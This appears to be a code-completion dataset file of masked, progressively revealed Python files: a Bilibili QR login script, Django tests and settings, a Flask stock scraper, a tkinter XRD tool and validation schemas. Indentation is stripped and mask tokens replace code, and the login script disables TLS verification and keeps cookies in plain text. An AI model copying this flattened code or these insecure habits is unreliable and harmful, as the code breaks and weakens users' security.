loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
<mask token>
| <mask token>
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open('bzcookies.txt', 'w') as f:
f.write('')
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get(
'https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers
).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png)
print(base64_data)
"""
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
"""
<mask token>
| <mask token>
requests.packages.urllib3.disable_warnings()
ua = UserAgent(path='ua.json')
user_agent = ua.chrome
headers = {'User-Agent': user_agent, 'Referer': 'https://www.bilibili.com/'}
headerss = {'User-Agent': user_agent, 'Host': 'passport.bilibili.com',
'Referer': 'https://passport.bilibili.com/login'}
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open('bzcookies.txt', 'w') as f:
f.write('')
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get(
'https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers
).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png)
print(base64_data)
"""
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
"""
if __name__ == '__main__':
bzlogin()
| import qrcode
from fake_useragent import UserAgent
from threading import Thread
import time, base64
import requests
from io import BytesIO
import http.cookiejar as cookielib
from PIL import Image
import os
requests.packages.urllib3.disable_warnings()
ua = UserAgent(path='ua.json')
user_agent = ua.chrome
headers = {'User-Agent': user_agent, 'Referer': 'https://www.bilibili.com/'}
headerss = {'User-Agent': user_agent, 'Host': 'passport.bilibili.com',
'Referer': 'https://passport.bilibili.com/login'}
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open('bzcookies.txt', 'w') as f:
f.write('')
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get(
'https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers
).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png)
print(base64_data)
"""
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
"""
if __name__ == '__main__':
bzlogin()
| # -*- coding: utf-8 -*-
#借鉴的扫码单文件
import qrcode
from fake_useragent import UserAgent
from threading import Thread
import time, base64
import requests
from io import BytesIO
import http.cookiejar as cookielib
from PIL import Image
import os
requests.packages.urllib3.disable_warnings()
ua = UserAgent(path='ua.json')
user_agent = ua.chrome
headers = {'User-Agent': user_agent, 'Referer': "https://www.bilibili.com/"}
headerss = {'User-Agent': user_agent, 'Host': 'passport.bilibili.com','Referer': "https://passport.bilibili.com/login"}
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get("https://api.bilibili.com/x/web-interface/nav", verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,',loginurl['data']['uname'],',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open("bzcookies.txt", 'w') as f:
f.write("")
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get('https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png) # 使用base64进行加密
print(base64_data)
'''
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
'''
if __name__ == '__main__':
bzlogin()
| [
4,
5,
7,
8,
9
] |
1,638 | 824038a56e8aaf4adf6ec813a5728ab318547582 | <mask token>
| <mask token>
class TestCommon(TestCase):
<mask token>
| <mask token>
class TestCommon(TestCase):
def test_get_method_config(self):
job = create_test_job(predictive_model=create_test_predictive_model
(predictive_model=PredictiveModels.CLASSIFICATION.value,
prediction_method=ClassificationMethods.RANDOM_FOREST.value))
method, config = get_method_config(job)
self.assertEqual(ClassificationMethods.RANDOM_FOREST.value, method)
self.assertEqual({'max_depth': None, 'max_features': 'auto',
'n_estimators': 10}, config)
| <mask token>
from django.test import TestCase
from src.core.common import get_method_config
from src.predictive_model.classification.models import ClassificationMethods
from src.predictive_model.models import PredictiveModels
from src.utils.tests_utils import create_test_job, create_test_predictive_model
class TestCommon(TestCase):
def test_get_method_config(self):
job = create_test_job(predictive_model=create_test_predictive_model
(predictive_model=PredictiveModels.CLASSIFICATION.value,
prediction_method=ClassificationMethods.RANDOM_FOREST.value))
method, config = get_method_config(job)
self.assertEqual(ClassificationMethods.RANDOM_FOREST.value, method)
self.assertEqual({'max_depth': None, 'max_features': 'auto',
'n_estimators': 10}, config)
| """
common tests
"""
from django.test import TestCase
from src.core.common import get_method_config
from src.predictive_model.classification.models import ClassificationMethods
from src.predictive_model.models import PredictiveModels
from src.utils.tests_utils import create_test_job, create_test_predictive_model
class TestCommon(TestCase):
def test_get_method_config(self):
job = create_test_job(
predictive_model=create_test_predictive_model(
predictive_model=PredictiveModels.CLASSIFICATION.value,
prediction_method=ClassificationMethods.RANDOM_FOREST.value
)
)
method, config = get_method_config(job)
self.assertEqual(ClassificationMethods.RANDOM_FOREST.value, method)
self.assertEqual({
'max_depth': None,
'max_features': 'auto',
'n_estimators': 10,
}, config)
| [
0,
1,
2,
3,
4
] |
1,639 | ea6d726e8163ed0f93b8078323fa5f4e9115ad73 | <mask token>
class TrafficScriptArg:
<mask token>
<mask token>
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| <mask token>
class TrafficScriptArg:
<mask token>
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u'--tx_if', help=u'interface that sends traffic')
parser.add_argument(u'--rx_if', help=u'interface that receives traffic'
)
if more_args is not None:
for arg in more_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name, nargs=u'?', default=u'')
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| <mask token>
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u'--tx_if', help=u'interface that sends traffic')
parser.add_argument(u'--rx_if', help=u'interface that receives traffic'
)
if more_args is not None:
for arg in more_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name, nargs=u'?', default=u'')
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| <mask token>
import argparse
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u'--tx_if', help=u'interface that sends traffic')
parser.add_argument(u'--rx_if', help=u'interface that receives traffic'
)
if more_args is not None:
for arg in more_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name, nargs=u'?', default=u'')
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| # Copyright (c) 2021 Cisco and/or its affiliates.
#
# SPDX-License-Identifier: Apache-2.0 OR GPL-2.0-or-later
#
# Licensed under the Apache License 2.0 or
# GNU General Public License v2.0 or later; you may not use this file
# except in compliance with one of these Licenses. You
# may obtain a copy of the Licenses at:
#
# http://www.apache.org/licenses/LICENSE-2.0
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
#
# Note: If this file is linked with Scapy, which is GPLv2+, your use of it
# must be under GPLv2+. If at any point in the future it is no longer linked
# with Scapy (or other GPLv2+ licensed software), you are free to choose
# Apache 2.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Traffic scripts argument parser library."""
import argparse
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u"--tx_if", help=u"interface that sends traffic")
parser.add_argument(u"--rx_if", help=u"interface that receives traffic")
if more_args is not None:
for arg in more_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name, nargs=u"?", default=u"")
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| [
2,
3,
4,
5,
6
] |
1,640 | 0058a6d3c9d4e600885b876614362ea4401ce2fe | <mask token>
| <mask token>
with open('src/time.txt', 'w') as f:
f.write(str(int(time.time())))
| import time
with open('src/time.txt', 'w') as f:
f.write(str(int(time.time())))
| import time
with open("src/time.txt", "w") as f:
f.write(str(int(time.time()))) | null | [
0,
1,
2,
3
] |
1,641 | 3be1947ead65f8e8a9bf73cc8cae2c7d69d8b756 | <mask token>
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
<mask token>
| <mask token>
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
@app.route('/stock', methods=['POST'])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data['ticker']).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get(
'https://finance.yahoo.com/quote/%s/analysts?p=%s' % (ticker,
ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all(
'tr')[3].find_all('td')[4].text
surprise = float(re.search('(.*)%', surprise_string)[1])
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
results = {'surprise': surprise_string, 'score': score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| <mask token>
app = flask.Flask(__name__)
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
@app.route('/stock', methods=['POST'])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data['ticker']).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get(
'https://finance.yahoo.com/quote/%s/analysts?p=%s' % (ticker,
ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all(
'tr')[3].find_all('td')[4].text
surprise = float(re.search('(.*)%', surprise_string)[1])
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
results = {'surprise': surprise_string, 'score': score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| import flask
import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
import pickle
from recent_earnings_tickers import ok_tickers
import re
<mask token>
app = flask.Flask(__name__)
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
@app.route('/stock', methods=['POST'])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data['ticker']).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get(
'https://finance.yahoo.com/quote/%s/analysts?p=%s' % (ticker,
ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all(
'tr')[3].find_all('td')[4].text
surprise = float(re.search('(.*)%', surprise_string)[1])
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
results = {'surprise': surprise_string, 'score': score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| import flask
import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
import pickle
from recent_earnings_tickers import ok_tickers
import re
#---------- Model ----------------#
#with open('/Users/samfunk/ds/metis/project_mcnulty/code/REPLACE_WITH_MODEL_PICKLE', 'rb') as f:
#PREDICTOR = pickle.load(f)
'''Have final model in the pickle file
Should be prefit to main data
Simply ask for a company/list of companies
Input the ticker into model (which will scrape web for current features)
Pray some of them are right'''
#---------- URLS AND WEB PAGES -------------#
app = flask.Flask(__name__)
@app.route('/')
def home_page():
with open("/Users/samfunk/ds/metis/project_mcnulty/stock_page.html",'r') as viz_file:
return viz_file.read()
@app.route("/stock", methods=["POST"])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data["ticker"]).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get("https://finance.yahoo.com/quote/%s/analysts?p=%s" % (ticker, ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all('tr')[3].find_all('td')[4].text
surprise = float(re.search(r'(.*)%', surprise_string)[1])
#score = PREDICTOR.predict_proba(x)
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
#score = PREDICTOR.predict_proba(x)
results = {"surprise": surprise_string, "score": score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| [
1,
3,
4,
5,
6
] |
1,642 | 137ed9c36265781dbebabbd1ee0ea84c9850201a | <mask token>
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
<mask token>
| <mask token>
matplotlib.use('TkAgg')
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
<mask token>
root.mainloop()
| <mask token>
matplotlib.use('TkAgg')
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
root = tk.Tk()
my_gui = mainwin(root)
root.mainloop()
| import tkinter as tk
from tkinter import Tk, ttk
from tkinter import filedialog
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
import matplotlib.animation as animation
from matplotlib import style
import crystalpeaktab as cp
import smallangletab as sa
matplotlib.use('TkAgg')
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title('University of Utah XRD Analysis Multi-tool')
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text='Crystallization Peak Fit')
self.tab_parent.add(self.tab2, text='Small Angle Simulation')
self.tab_parent.grid(row=1, column=0)
tk.Label(self.master, text='').grid(row=2, column=3)
cp.tab(self.tab1)
sa.tab(self.tab2)
root = tk.Tk()
my_gui = mainwin(root)
root.mainloop()
| import tkinter as tk
from tkinter import Tk, ttk
from tkinter import filedialog
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg, NavigationToolbar2Tk)
from matplotlib.figure import Figure
import matplotlib.animation as animation
from matplotlib import style
import crystalpeaktab as cp
import smallangletab as sa
matplotlib.use("TkAgg")
class mainwin:
def __init__(self, master):
self.master = master
master.title
master.title("University of Utah XRD Analysis Multi-tool")
#Sets up tabs
self.tab_parent = ttk.Notebook(master)
self.tab1 = ttk.Frame(self.tab_parent)
self.tab2 = ttk.Frame(self.tab_parent)
self.tab3 = ttk.Frame(self.tab_parent)
self.tab_parent.add(self.tab1, text="Crystallization Peak Fit")
self.tab_parent.add(self.tab2, text="Small Angle Simulation")
self.tab_parent.grid(row=1, column=0)
# Spacers
tk.Label(self.master, text="").grid(row=2, column=3)
# Sets the first tab to be the crystal peak analysis
cp.tab(self.tab1)
# Sets the second tab to be the Small Angle Analytic Simulation
sa.tab(self.tab2)
# ======================================================================================================================
# ======================================================================================================================
# MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN MAIN
# ======================================================================================================================
root = tk.Tk()
my_gui = mainwin(root)
root.mainloop()
# ======================================================================================================================
# ======================================================================================================================
| [
2,
3,
4,
5,
6
] |
1,643 | ab35684166f07a3ab9e64f2ff98980e25a3fc576 | <mask token>
| <mask token>
DEBUG = True
SECRET_KEY = os.environ['SECRET_KEY']
ROOT_URLCONF = 'floweryroad.urls.docker_production'
ALLOWED_HOSTS = [os.environ['WEB_HOST']]
CORS_ORIGIN_WHITELIST = [os.environ['CORS']]
DATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['DB_NAME'], 'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'], 'HOST': os.environ['DB_HOST'],
'PORT': os.environ['DB_PORT']}}
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = os.environ['MEDIA']
| from django.conf import settings
from .base import *
import os
DEBUG = True
SECRET_KEY = os.environ['SECRET_KEY']
ROOT_URLCONF = 'floweryroad.urls.docker_production'
ALLOWED_HOSTS = [os.environ['WEB_HOST']]
CORS_ORIGIN_WHITELIST = [os.environ['CORS']]
DATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['DB_NAME'], 'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'], 'HOST': os.environ['DB_HOST'],
'PORT': os.environ['DB_PORT']}}
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = os.environ['MEDIA']
| null | null | [
0,
1,
2
] |
1,644 | f13ccbfb27788deca0d4f4b58a4e9e8c7e8e0306 | <mask token>
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| <mask token>
if TYPE_CHECKING:
from stake.client import StakeClient
<mask token>
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| <mask token>
if TYPE_CHECKING:
from stake.client import StakeClient
camelcase = partial(inflection.camelize, uppercase_first_letter=False)
__all__ = ['SideEnum']
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| import weakref
from enum import Enum
from functools import partial
from typing import TYPE_CHECKING
import inflection
if TYPE_CHECKING:
from stake.client import StakeClient
camelcase = partial(inflection.camelize, uppercase_first_letter=False)
__all__ = ['SideEnum']
class SideEnum(str, Enum):
BUY = 'B'
SELL = 'S'
class BaseClient:
def __init__(self, client: 'StakeClient'):
self._client = weakref.proxy(client)
| import weakref
from enum import Enum
from functools import partial
from typing import TYPE_CHECKING
import inflection
if TYPE_CHECKING:
from stake.client import StakeClient
camelcase = partial(inflection.camelize, uppercase_first_letter=False)
__all__ = ["SideEnum"]
class SideEnum(str, Enum):
BUY = "B"
SELL = "S"
class BaseClient:
# flake8: noqa
def __init__(self, client: "StakeClient"):
self._client = weakref.proxy(client)
| [
4,
5,
6,
7,
8
] |
1,645 | bf41ab20b9fae9f19efdc58852e48d9b735f34c3 | <mask token>
| user_schema = {'id': {'type': 'string', 'required': True, 'coerce': (str,
lambda x: x.lower())}, 'latitude': {'type': 'float', 'required': True,
'min': -60.0, 'max': 10, 'coerce': (float, lambda x: round(x, 5))},
'longitude': {'type': 'float', 'required': True, 'min': -80.0, 'max': -
30.0, 'coerce': (float, lambda x: round(x, 5))}, 'radius': {'type':
'float', 'default': 10, 'max': 30.0, 'min': 0.1, 'coerce': (float, lambda
x: round(x, 1))}, 'variables': {'type': 'list', 'default': ['lightning',
'precipitation'], 'allowed': ['lightning', 'precipitation']}}
create_schema = {'payload': {'oneof': [{'type': 'list', 'schema': {'type':
'dict', 'schema': user_schema}}, {'type': 'dict', 'schema': user_schema}]}}
batch_create_schema = {'payload': {'type': 'list', 'schema': {'type':
'dict', 'schema': user_schema}}}
payload_schema = {'payload': {'type': 'dict', 'schema': user_schema}}
event_schema = {'pathParameters': {'type': 'dict', 'default': {}, 'schema':
{'uid': {'type': 'string', 'required': True}}}}
| user_schema = {
'id': {
'type': 'string',
'required': True,
'coerce': (str, lambda x: x.lower())
},
'latitude':{
'type': 'float',
'required': True,
'min': -60.0,
'max': 10,
'coerce': (float, lambda x: round(x, 5))
},
'longitude':{
'type': 'float',
'required': True,
'min': -80.0,
'max': -30.0,
'coerce': (float, lambda x: round(x, 5))
},
'radius':{
'type': 'float',
'default': 10,
'max': 30.0,
'min': 0.1,
'coerce': (float, lambda x: round(x, 1))
},
'variables':{
'type': 'list',
'default': ['lightning','precipitation'],
'allowed': [
'lightning',
'precipitation'
]
}
}
create_schema = {
'payload':{
'oneof':[
{
'type': 'list',
'schema':{
'type': 'dict',
'schema': user_schema
}
},
{
'type': 'dict',
'schema': user_schema
}
]
}
}
batch_create_schema = {
'payload':{
'type': 'list',
'schema':{
'type': 'dict',
'schema': user_schema
}
}
}
payload_schema = {
'payload':{
'type': 'dict',
'schema': user_schema
}
}
